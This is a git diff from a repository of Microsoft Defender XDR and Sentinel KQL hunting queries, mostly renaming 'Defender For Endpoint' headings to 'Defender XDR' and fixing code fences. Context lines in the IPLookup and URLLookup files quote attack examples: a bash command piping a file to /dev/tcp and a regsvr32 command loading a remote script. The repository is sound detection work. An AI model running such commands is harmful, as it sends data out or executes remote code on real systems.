Template Update

Azure Active Directory/AllGraphPermissionsAdded.md

@@ -32,4 +32,4 @@ AuditLogs
 | extend ServicePrincipalAppId = replace_string(tostring(todynamic(TargetResources).modifiedProperties[5].newValue),'"','')
 | where AddedPermission endswith ".All"
 | project-reorder TimeGenerated, InitiatedByUserPrincipalName, ActivityDisplayName, AddedPermission, IP, ServicePrincipalAppId
-```
+```

Azure Active Directory/GraphMailPermissions.md

@@ -36,4 +36,4 @@ AuditLogs
 | extend TotalPermissions = array_length(Permissions)
 | project TotalPermissions, ServicePrincipalAppId, InitiatedByUserPrincipalName, IP, Permissions
 | sort by TotalPermissions
-```
+```

Azure Active Directory/GroupMembershipReport.md

@@ -28,4 +28,4 @@ IdentityInfo
 | where isnotempty(GroupMembership)
 | summarize TotalMemberships = dcount(tostring(GroupMembership)), MemberOf = make_set(tostring(GroupMembership), 1000) by AccountObjectId, AccountDisplayName, AccountUPN
 | extend ReportDate = now()
-```
+```

Azure Active Directory/MonitorCloudBreakGlassAccount.md

@@ -11,7 +11,7 @@ If an attacker could get access to a break glass account, this account could be
 #### Author
 - **Github: https://github.com/erikgruetter**
 
-## Defender For Endpoint
+## Defender XDR
 ```
 AADSignInEventsBeta
 | where AccountDisplayName  == "Input display name of account here"

Azure Active Directory/MultipleAccountsLocked.md

@@ -29,4 +29,4 @@ SigninLogs
 | where TotalAccounts >= Threshold
 | extend GeoIPInfo = geo_info_from_ip_address(IPAddress)
 | extend country = tostring(parse_json(GeoIPInfo).country), state = tostring(parse_json(GeoIPInfo).state), city = tostring(parse_json(GeoIPInfo).city)
-```
+```

Azure Active Directory/NewAuthenticationAppDetected.md

@@ -20,7 +20,7 @@ A malicious actor installs a malicious app in your environment. This app can the
 - https://learn.microsoft.com/en-us/security/compass/incident-response-playbook-compromised-malicious-app
 - https://www.lares.com/blog/malicious-azure-ad-application-registrations/
 
-## Defender For Endpoint
+## Defender XDR
 ```KQL
 let KnownApps = AADSignInEventsBeta
 // Adjust the timerange depending on the retention period

Azure Active Directory/NewUserAgentUsed.md

@@ -10,7 +10,7 @@ False positives can be new browser updates that trigger new UserAgents, this wil
 #### Risk
 A malicious actor signs in to your tenant with a user agent that is not user in your environment. It can also be a script that uses (leaked) credentials on your tentant.
 
-## Defender For Endpoint
+## Defender XDR
 ```KQL
 let KnownUserAgents = AADSignInEventsBeta
   | where Timestamp > ago(30d) and Timestamp < ago(3d)

Azure Active Directory/PotentialAiTMPhishing.md

@@ -21,7 +21,7 @@ Adversary in the middle phishing has successfully been peformed on a user and th
 - https://techcommunity.microsoft.com/t5/azure-data-explorer-blog/aitm-amp-bec-threat-hunting-with-kql/ba-p/3885166
 - https://jeffreyappel.nl/aitm-mfa-phishing-attacks-in-combination-with-new-microsoft-protections-2023-edt/
 
-## Defender For Endpoint
+## Defender XDR
 ```KQL
 AADSignInEventsBeta
 | where Application == "OfficeHome"
@@ -41,4 +41,4 @@ SigninLogs
 | summarize RiskLevels = make_set(RiskLevelDuringSignIn), ResultTypes = make_set(ResultType), IPs = make_set(IPAddress) by CorrelationId, UserPrincipalName
 // Optional to only filter on events with a RiskLevel during the sign-in
 //| where RiskLevels has_any ("low", "medium", "high")
-```
+```

Azure Active Directory/RoleReport.md

@@ -28,4 +28,4 @@ IdentityInfo
 | summarize TotalRoles = dcount(tostring(AssignedRoles)), MemberOf = make_set(tostring(AssignedRoles), 1000) by AccountObjectId, AccountDisplayName, AccountUPN
 | extend ReportDate = now()
 | sort by TotalRoles desc
-```
+```

Azure Active Directory/SignInFromSuspiciousIP.md

@@ -24,4 +24,4 @@ let IPs = ThreatIntelligenceIndicator
 SigninLogs
 | where IPAddress in (IPs)
 | project TimeGenerated, UserPrincipalName, IPAddress, Location
-```
+```

Azure Active Directory/SignInsByBrowser.md

@@ -6,7 +6,7 @@
 This query lists all the different browsers that are used to succesfully sign in to your Entra ID Tenant. This could be used to detect rare browsers that are used to sign into your tenant.
 
 
-## Defender For Endpoint
+## Defender XDR
 ```KQLAADSignInEventsBeta
 | where isnotempty(UserAgent)
 // Filter for successful sign ins only

Azure Active Directory/SignInsByOS.md

@@ -7,7 +7,7 @@ This query can be used to detect rare operating systems that are used to sign in
 
 This query can also be used to determine with Operting Systems need to be added to your Conditional Access Policies.
 
-## Defender For Endpoint
+## Defender XDR
 ```KQL
 AADSignInEventsBeta
 | where isnotempty(UserAgent)

Azure Active Directory/SignInsByUserAgent.md

@@ -7,7 +7,7 @@ This query can be used to detect rare UserAgents that are used to sign into your
 
 The query can be extended by filtering on succesful and failed sign ins. 
 
-## Defender For Endpoint
+## Defender XDR
 ```KQL
 AADSignInEventsBeta
 | summarize count() by UserAgent

Azure Active Directory/SuccessfulSignInFromNewCountry.md

@@ -8,7 +8,7 @@ This query detects successful signins from countries that have not been seen bef
 #### Risk
 An adversary signs in from a new country to your azure AD tenant.
 
-## Defender For Endpoint
+## Defender XDR
 ```KQL
 let KnownCountries = AADSignInEventsBeta
     | where Timestamp > ago(30d) and Timestamp < ago(3d)

Azure Active Directory/Top10UsersWithTheMostSignInIPsUsed.md

@@ -10,7 +10,7 @@ False positives can be a VPN that changes IP addresses, which results in a high
 #### Risk
 The risk is that an actor uses an rare IP address to sign into your tenant.
 
-## Defender For Endpoint
+## Defender XDR
 ```KQL
 AADSignInEventsBeta
 | summarize IPsUsed = make_set(IPAddress), locations = make_set(Country) by AccountObjectId

Azure Active Directory/TopNAccountsLongestPeriodWithoutPasswordReset.md

@@ -11,7 +11,7 @@ If a password has not been changed for years, it might be that the account does
 #### References
 - https://learn.microsoft.com/en-us/microsoft-365/admin/misc/password-policy-recommendations?view=o365-worldwide
 
-## Defender For Endpoint
+## Defender XDR
 ```KQL
 let LatestNChanges = 100;
 AADSignInEventsBeta

Azure Active Directory/TotalAllGraphPermissionsAdded.md

@@ -30,4 +30,4 @@ AuditLogs
 | extend TotalPermissions = array_length(Permissions)
 | project TotalPermissions, ServicePrincipalAppId, InitiatedByUserPrincipalName, IP, Permissions
 | sort by TotalPermissions
-```
+```

Azure Active Directory/Visualization - AccountsLongestPeriodWithoutPasswordReset.md

@@ -11,7 +11,7 @@ If a password has not been changed for years, it might be that the account does
 #### References
 - https://learn.microsoft.com/en-us/microsoft-365/admin/misc/password-policy-recommendations?view=o365-worldwide
 
-## Defender For Endpoint
+## Defender XDR
 ```KQL
 AADSignInEventsBeta
 | where Timestamp > ago(30d)

Azure Active Directory/nf_ttp_t1562.001_scattered-spider_abuse conditional_access_trusted_locations.md

@@ -25,7 +25,7 @@ The risk addressed here is the manipulation of access controls to evade detectio
 - [Microsoft Documentation on Conditional Access Policies](https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/)
 - [MITRE ATT&CK on Defense Evasion](https://attack.mitre.org/tactics/TA0005/)
 
-## Defender For Endpoint
+## Defender XDR
 ```KQL
 AuditLogs
 | where OperationName =~ "Update conditional access policy" and TargetResources has_all ('locations','excludeLocations')

Azure Resource Graph/README.md

@@ -52,4 +52,4 @@ Microsoft has provided various KQL examples that can be used in your environment
 
 When using the docs, select portal to get the KQL queries as marked below.
 
-![Azure Resource Graph Docs](Images/Portal.png)
+![Azure Resource Graph Docs](Images/Portal.png)

Cloud Audit Events/CloudResourceDeletion.md

@@ -17,12 +17,12 @@ An actor deletes multiple cloud resources to create impact.
 #### References
 - https://learn.microsoft.com/en-us/defender-xdr/advanced-hunting-cloudauditevents-table
 
-## Defender For Endpoint
+## Defender XDR
 ```KQL
 let Threshold = 20;
 let BinSize = 1d;
 CloudAuditEvents
 | where ActionType == "CloudAuditEventDelete"
 | summarize TotalActions = count(), arg_max(Timestamp, *) by bin(Timestamp, BinSize), Account, DataSource
 | where TotalActions > Threshold
-```
+```

DFIR/Defender For Endpoint/MDE - AllProcessesCreatedByMaliciousFile.md

@@ -1,6 +1,6 @@
 # Find all the processes a file has created and the associated FileNames, FileLocations and SHA1 hashes that the file has had. 
 ----
-### Defender For Endpoint
+### Defender XDR
 
 ```
 // For the best results use SHA1

DFIR/Defender For Endpoint/MDE - Antivirus-Detections-by-Compromised-Device.md

@@ -1,6 +1,6 @@
 # Find the DFE Antivirus events on compromised devices. FileInfo is stored in JSON format.
 ----
-### Defender For Endpoint
+### Defender XDR
 
 ```
 let CompromisedDevices = dynamic (["laptop1", "server2"]);

DFIR/Defender For Endpoint/MDE - BrowserLaunchedToOpenUrlByCompromisedDevice.md

@@ -1,6 +1,6 @@
 # Find all the activities that launched a browser to open a URL from a compromised device.
 
-### Defender For Endpoint
+### Defender XDR
 
 ```
 let CompromisedDevice = "laptop.contoso.com";

DFIR/Defender For Endpoint/MDE - Connections-Made-By-Office-Compromised-Device.md

@@ -1,6 +1,6 @@
 # Find all the connections that have been made by Office from a compromised device. 
 ----
-### Defender For Endpoint
+### Defender XDR
 
 ```
 let ConnectionsMadeByOfficeRegKey = @'\SOFTWARE\Microsoft\Office\16.0\Common\Internet\Server Cache';

DFIR/Defender For Endpoint/MDE - FileEnrichmentOnSuspiciousFile.md

@@ -1,6 +1,6 @@
 # File Enrichment on Suspicious File
 ----
-### Defender For Endpoint
+### Defender XDR
 
 ```
 let SuspiciousDownloadName = 'GoogleUpdateSetup.exe';

DFIR/Defender For Endpoint/MDE - IPLookup.md

@@ -14,7 +14,7 @@ bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
 #### References
 - https://lolbas-project.github.io/lolbas/Binaries/Rundll32/
 - https://lolbas-project.github.io/lolbas/Binaries/Bash/
-## Defender For Endpoint
+## Defender XDR
 ```
 // Set the IP address you are trying to lookup.
 let LookupIP = "127.0.0.1";

DFIR/Defender For Endpoint/MDE - InboundConnectionsCompromisedDevice.md

@@ -8,7 +8,7 @@ This query can be used to get a quick overview of all the inbound connections th
 #### References
 - https://www.microsoft.com/en-us/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/
 
-## Defender For Endpoint
+## Defender XDR
 ```
 // Add the device you are investigating in the CompromisedDevice variable
 let CompromisedDevice = "test.domain.tld";

DFIR/Defender For Endpoint/MDE - InternalConnectionsMadeByCompromisedDevice.md

@@ -9,7 +9,7 @@ This query will most likely, depending on the setup of your organization always
 
 This is query is aimed to be part of your inciden triage, to discover or exclude potential lateral movement in an efficient manner. 
 
-## Defender For Endpoint
+## Defender XDR
 ```
 // Add the device you are investigating in the CompromisedDevice variable
 let CompromisedDevice = "compromiseddevice";

DFIR/Defender For Endpoint/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md

@@ -1,6 +1,6 @@
 # Find all attachments that have been send from a compromised mailbox and which devices have opened that attachment.  
 ----
-### Defender For Endpoint
+### Defender XDR
 
 ```
 let CompromisedMailbox = "[email protected]";

DFIR/Defender For Endpoint/MDE - MostRecentPowershellExecutionsByCompromisedDevice.md

@@ -1,6 +1,6 @@
 # Show the last 100 Powershell executions from a compromised device
 ----
-### Defender For Endpoint
+### Defender XDR
 
 ```
 let CompromisedDevice = "laptop.contoso.com";

DFIR/Defender For Endpoint/MDE - NetActivities.md

@@ -1,6 +1,6 @@
 # List all net(1).exe activities on a host
 ----
-### Defender For Endpoint
+### Defender XDR
 
 ```
 let CompromisedDevice = "azurewin2022";

DFIR/Defender For Endpoint/MDE - Open-SMB-Connections-By-Compromised-Device.md

@@ -1,6 +1,6 @@
 # Show all successful SMB connections of a compromised device
 ----
-### Defender For Endpoint
+### Defender XDR
 
 ```
 let CompromisedDevice = "laptop1";

DFIR/Defender For Endpoint/MDE - Registry-Run-Keys-Forensics.md

@@ -1,6 +1,6 @@
 # Forensics on Registry Run keys in Windows. Registry Run keys can be used to establish persistence on a device. 
 ----
-### Defender For Endpoint
+### Defender XDR
 
 ```
 let RegistryRunKeys = dynamic 

DFIR/Defender For Endpoint/MDE - TriggeredASREventsFromCompromisedDevice.md

@@ -1,6 +1,6 @@
 # Find all the ASR events that have triggered from a compromised device
 
-### Defender For Endpoint
+### Defender XDR
 
 ```
 let CompromisedDevice = "laptop1";

DFIR/Defender For Endpoint/MDE - URLLookup.md

@@ -19,7 +19,7 @@ cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redca
 - https://www.bleepingcomputer.com/news/security/windows-10-background-image-tool-can-be-abused-to-download-malware/
 - https://lolbas-project.github.io/lolbas/Binaries/Cmd/
 
-## Defender For Endpoint
+## Defender XDR
 ```
 // Set the URL you are trying to lookup.
 // Lookup in this query is done with a contains, if this results in to many false positives add www. before the rest of the url.

DFIR/Defender For Endpoint/MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md

@@ -1,6 +1,6 @@
 # Find all the activities that launched a browser to open a URL from a compromised device.
 
-### Defender For Endpoint
+### Defender XDR
 
 ```
 let CompromisedDevice = "laptop.contoso.com";

DFIR/Defender For Identity/MDI - ADGroupAdditions.md

@@ -9,7 +9,7 @@ This query can be used to list all Active Directory group additions. The query u
 - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-identitydirectoryevents-table?view=o365-worldwide
 - https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-default-user-accounts
 
-## Defender For Endpoint
+## Defender XDR
 ```
 let Groups = dynamic(['Domain Admins', 'GroupName2']); // Add your sensitive groups to this list
 let SearchWindow = 48h; //Customizable h = hours, d = days

DFIR/Defender For Identity/MDI - Devices-Accessed-By-Compromised-Device.md

@@ -1,6 +1,6 @@
 # Find which devices have been accessed by a compromised device and which protocol was used to connect
 ----
-### Defender For Endpoint
+### Defender XDR
 
 ```
 let CompromisedDevice = "laptop.contoso.com";

DFIR/Defender For Identity/MDI - LDAPQueriesByCompromisedDevice.md

@@ -1,6 +1,6 @@
 # Find all the executed LDAP queries from a compromised device
 
-### Defender For Endpoint
+### Defender XDR
 
 ```
 let CompromisedDevice = "laptop1.com";

DFIR/Defender For Identity/MDI - Lateral-Movement-By-Compromised-Accounts.md

@@ -1,6 +1,6 @@
 # Find which devices have been accessed by a list of compromised accounts and which protocol was used to connect
 ----
-### Defender For Endpoint
+### Defender XDR
 
 ```
 let ComprimsedUsers = dynamic(['user1', 'user2']);

DFIR/Defender For Office/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md

@@ -1,6 +1,6 @@
 # Find all attachments that have been send from a compromised mailbox and which devices have opened that attachment.  
 ----
-### Defender For Endpoint
+### Defender XDR
 
 ```
 let CompromisedMailbox = "[email protected]";

DFIR/Defender For Office/MDO- FindRelatedMails.md

@@ -8,7 +8,7 @@ The EmailClusterId which can be assigned to a mail is the identifier for the gro
 #### References
 - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-emailevents-table?view=o365-worldwide
 
-### Defender For Endpoint
+### Defender XDR
 ```
 let MaliciousEmailCluseriId = "3163234347533"; // Input the EmailClusterId here
 EmailEvents

DFIR/Exposure Management/ExposureManagement - DeviceActivities.md

@@ -9,4 +9,4 @@ ExposureGraphEdges
 | where SourceNodeName == DeviceName
 | summarize Total = dcount(TargetNodeName), Details = make_set(TargetNodeName) by EdgeLabel, SourceNodeName
 | project Source = SourceNodeName, Action = EdgeLabel, Details, Tota
-```
+```

DFIR/ExposureManagement - DeviceActivities.md

@@ -9,4 +9,4 @@ ExposureGraphEdges
 | where SourceNodeName == DeviceName
 | summarize Total = dcount(TargetNodeName), Details = make_set(TargetNodeName) by EdgeLabel, SourceNodeName
 | project Source = SourceNodeName, Action = EdgeLabel, Details, Tota
-```
+```

DFIR/MDE - AllProcessesCreatedByMaliciousFile.md

@@ -1,6 +1,6 @@
 # Find all the processes a file has created and the associated FileNames, FileLocations and SHA1 hashes that the file has had. 
 ----
-### Defender For Endpoint
+### Defender XDR
 
 ```
 // For the best results use SHA1

DFIR/MDE - Antivirus-Detections-by-Compromised-Device.md

@@ -1,6 +1,6 @@
 # Find the DFE Antivirus events on compromised devices. FileInfo is stored in JSON format.
 ----
-### Defender For Endpoint
+### Defender XDR
 
 ```
 let CompromisedDevices = dynamic (["laptop1", "server2"]);